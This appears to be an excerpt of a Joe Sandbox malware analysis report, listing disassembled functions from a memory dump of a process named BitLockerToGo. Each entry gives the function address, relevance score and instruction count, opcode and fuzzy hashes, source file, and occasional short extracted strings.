                                                                                                                                                                                                            • Instruction ID: 9732de87ecb182f2271c988b8e40e3b004a85c04e183e157bc0133afcabd703d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b4730b591edb9b796dc1a7cdf100b83fbe1eb626615b9897db752f12f111dbd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D261C271618F808BD364CA3CC995256BAD2AF96334F188B6DE1FA8B7D2D778A4058701
                                                                                                                                                                                                            Function 0040EB80 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ~
                                                                                                                                                                                                            • API String ID: 0-1707062198
                                                                                                                                                                                                            • Opcode ID: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
                                                                                                                                                                                                            • Instruction ID: aad47e99843925c2084c89470e4a7e36356acbeb38c1926c5526f137fb7122d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bde353b180e3433f99e206e2358377bdfc5ba822801ea3c6ae1797dc9d290ef
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2351013151C7908AD7249B3984402EFBBD1AB97364F288E3FE9E5973D1D2398403974B
                                                                                                                                                                                                            Function 0043F830 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XL
                                                                                                                                                                                                            • API String ID: 0-2397331993
                                                                                                                                                                                                            • Opcode ID: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
                                                                                                                                                                                                            • Instruction ID: aa4fe24152c52a858318c677d95a7a0c2cd254ae91a73a2a1ffc4a6790d9ff85
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1419C38258351DFD3049F38E85066AB7E0FB4A315F0998BDD4C683361D37A99A5CB06
                                                                                                                                                                                                            Function 004155DB Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                            • API String ID: 2994545307-1553575800
                                                                                                                                                                                                            • Opcode ID: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
                                                                                                                                                                                                            • Instruction ID: 2386a0911aa688524989a8340c90167ef89acf6b9e7633cd49b65fbe482c82f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31C371614645CFD728CF28C9517EBB7E6ABDA304F44853ED086CB351EB349444CB86
                                                                                                                                                                                                            Function 0041BFCA Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: SUQ
                                                                                                                                                                                                            • API String ID: 0-2651150828
                                                                                                                                                                                                            • Opcode ID: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
                                                                                                                                                                                                            • Instruction ID: 42c55c053425e0b0fbc475bcc9400de1786cc42e84e4724c7975db07e5bacbf3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE21B1706083818FC714CF28C4A07ABBFE2AFD6328F188A5DE5E547392D335C4498766
                                                                                                                                                                                                            Function 0042BA79 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: j
                                                                                                                                                                                                            • API String ID: 0-2137352139
                                                                                                                                                                                                            • Opcode ID: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
                                                                                                                                                                                                            • Instruction ID: f136246ef15f79f812ec07c1db461e86a52f6259eac92e8ccd6656980116f0fb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 902124316083928AD3258F36945076BBBD5DFD7304F18889EE5C5AB382CB7884028B5A
                                                                                                                                                                                                            Function 0042C140 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 'C
                                                                                                                                                                                                            • API String ID: 0-1959375024
                                                                                                                                                                                                            • Opcode ID: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
                                                                                                                                                                                                            • Instruction ID: 6a2eb9f9bc051ac7585a28991c81e0efb8283155a37514e0de2331f159ba5eab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6401283070C3618FC715CF69E5C0227BBE2EBD6300F1891AAD8D49B216C679C90A879F
                                                                                                                                                                                                            Function 0043E6E0 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: X|T
                                                                                                                                                                                                            • API String ID: 0-2625694639
                                                                                                                                                                                                            • Opcode ID: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
                                                                                                                                                                                                            • Instruction ID: d1cbbd9272d1375db2703005e1fbf4b2755e8cb02be92dc54b6a5afa885c6bec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01014477E997A48FD3485F749CC607BB2E0EB47705F0A183DEDC9AB280C5659D00D648
                                                                                                                                                                                                            Function 00416148 Relevance: 1.0, Instructions: 974COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
                                                                                                                                                                                                            • Instruction ID: 40a78145a15ed7abd580535788d63f0ce19baa41bfbb966a4b0a28bc3c900fb3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33428C759183518BD724CF28C850BBBB7E2EB97304F1A887DD4C297292D738D941CB9A
                                                                                                                                                                                                            Function 004065F0 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0cd38c1f917d56529f2e9072a767a05c965a744410acbca6e37e46bfde3c2afc
                                                                                                                                                                                                            • Instruction ID: 0b7c30790ff7d95851666302495b6cb6b96fef3e5f93ae92670a14908cf15253
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd38c1f917d56529f2e9072a767a05c965a744410acbca6e37e46bfde3c2afc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC52C4B0908B848FE735CB24C4843A7BBE1AB91314F16893FC5D716BC2C37DA995971A
                                                                                                                                                                                                            Function 00402ED0 Relevance: .7, Instructions: 657COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
                                                                                                                                                                                                            • Instruction ID: 5393f3433c53e1f8dfd6ebf06364cad0a5c17ff95c182cda39d20013721ad581
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA52E4715083458FCB15CF14C0906AABFE1BF89305F188A7EF8996B381D779EA49CB85
                                                                                                                                                                                                            Function 0043F0CB Relevance: .7, Instructions: 655COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
                                                                                                                                                                                                            • Instruction ID: 4f29358fa94e60aeb1969c962f0f8eec6781083342835fdf5c39f23cee3708bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E512213AB58351CFC704CF68E8D026AB7E2FB8A314F0A847DD58587361D7789855CB86
                                                                                                                                                                                                            Function 004073C0 Relevance: .6, Instructions: 608COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
                                                                                                                                                                                                            • Instruction ID: b00a11197861395ebb150adc986e88646148ed7565683f65526ca2b7b29a586a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD128631A0C7118BD724DF58D8816ABB3E1FBC4305F29893ED986A7281D738B915CB87
                                                                                                                                                                                                            Function 004038D0 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 33f6b6bf988d0bc28af98b4a3afc124b895597901a604a82cf678b12a907b646
                                                                                                                                                                                                            • Instruction ID: 8f5dcc2dcb728897a76ec87141d143f4f47f9916a17ff80561f346b336745cb7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33f6b6bf988d0bc28af98b4a3afc124b895597901a604a82cf678b12a907b646
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                                                                                                                                            Function 0041EFE0 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
                                                                                                                                                                                                            • Instruction ID: 032fafdfe8fcb9316dd3be8f47d4dae1e8b19dbe72e2b5a4dcd20de423910f36
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45523AB0518B819ED3358F3C8855796BFE5AB5A324F048B9DE0FA873D2C7756002CB66
                                                                                                                                                                                                            Function 0043F1B0 Relevance: .6, Instructions: 590COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
                                                                                                                                                                                                            • Instruction ID: abfb7d9fc99d8245844b88641aefb67395d9c82b051767d5b5d882fb86d86362
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D02203AB98351CFC704CF68E8D026AB7E2FBCA314F09887DD58587361D6789855CB86
                                                                                                                                                                                                            Function 0043F2F6 Relevance: .5, Instructions: 483COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
                                                                                                                                                                                                            • Instruction ID: 977cdf3f0cd69d8d458b49495e96b3aa17e1ec8412a9fe5b35dbe338883eb9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BE11F39798351CFC304CF68E89122AB7E2FB8A314F09887DD58687362D778D895CB46
                                                                                                                                                                                                            Function 0043F330 Relevance: .5, Instructions: 478COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
                                                                                                                                                                                                            • Instruction ID: 4c2b0347f53e4351c48a861a59ba72d78d96e03e5b29047675d502fe45a0e231
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EE12139758351CFC708CF68E89062AB7E2FB8A314F09887DD58587362D778D895CB46
                                                                                                                                                                                                            Function 00421C80 Relevance: .5, Instructions: 462COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
                                                                                                                                                                                                            • Instruction ID: be10e8665051b82c00c08677856a35fb821d43083445774c7d177a85f24fb323
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26C12772B042209BD7149F24DC8267BB3F1EFA1314F5A842EE89597391E37CED05839A
                                                                                                                                                                                                            Function 004393D0 Relevance: .5, Instructions: 453COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
                                                                                                                                                                                                            • Instruction ID: 046a7b96ccfc149aed725a1963e6503e11e8b1bcba22f1082ba47fe7bcb8cccf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46C1AE32A483109BD724DF25CC8172BB7A2ABCA314F19A53EE99567381D378DC01C79A
                                                                                                                                                                                                            Function 0043F450 Relevance: .5, Instructions: 452COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
                                                                                                                                                                                                            • Instruction ID: 3e46ab952dc263d79a64f3095437ed38b519a89b60fb8defccb58f8934dfbd56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98D1203A6583508FC304CF78E89126BBBE2FBCA314F09887DE98587361D678D955CB46
                                                                                                                                                                                                            Function 00425850 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 619f117b9e7d4e02d5717a9d5929c797240aa76386e188f746d9a77bf4754f46
                                                                                                                                                                                                            • Instruction ID: fae658bd8ddb3043f4f110c14bac76457b0c84561dfd849755bc4a1f115fdbab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 619f117b9e7d4e02d5717a9d5929c797240aa76386e188f746d9a77bf4754f46
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E10FB561C340DFE3249F25E885B2BB7E1FBC5304F94983DE18687261D7789906CB4A
                                                                                                                                                                                                            Function 0043F3C0 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
                                                                                                                                                                                                            • Instruction ID: e9ede8447672369631e443a496d4183c01172dbdfa4dcc616eca2a96a95990bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2D1203A758340CFC708CF68E89166AB7E2FB8A314F09887DD58587362D778D895CB46
                                                                                                                                                                                                            Function 004058E0 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4457b8bbef530b0ec8ff7a72168ac947b05954898d8f4aec68d7b83da9fe319c
                                                                                                                                                                                                            • Instruction ID: aae6921d5a17989d66cdc80315faadb92e0547eb6011da501a7e880e04b63f6d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4457b8bbef530b0ec8ff7a72168ac947b05954898d8f4aec68d7b83da9fe319c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE179711087418FD721DF29C880A2BBBE1EF99300F44882EF5D597792E679E948CB96
                                                                                                                                                                                                            Function 0041D530 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3bd14778522476ee65d3a3e71fd38209e9ad3e1b72483ae0a20f5c01825fd81a
                                                                                                                                                                                                            • Instruction ID: bc063801e0b7d3404796c06f73d7381230a3f611ffcc32f54e55ab691aceff1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bd14778522476ee65d3a3e71fd38209e9ad3e1b72483ae0a20f5c01825fd81a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3B108B9904201AFD7109F24CC41B5BBBE1BF98358F144A7EF4A8973A0D73A99588F46
                                                                                                                                                                                                            Function 00406160 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e5c12fcaa893704ba3a3abf2a1d9b2e78b5fd7c594974b0ad341749cb65ae105
                                                                                                                                                                                                            • Instruction ID: c1a9b7a256966d7355f078d51cac888a243f3eaa5ef4bc6392bd96d6d9370d7a
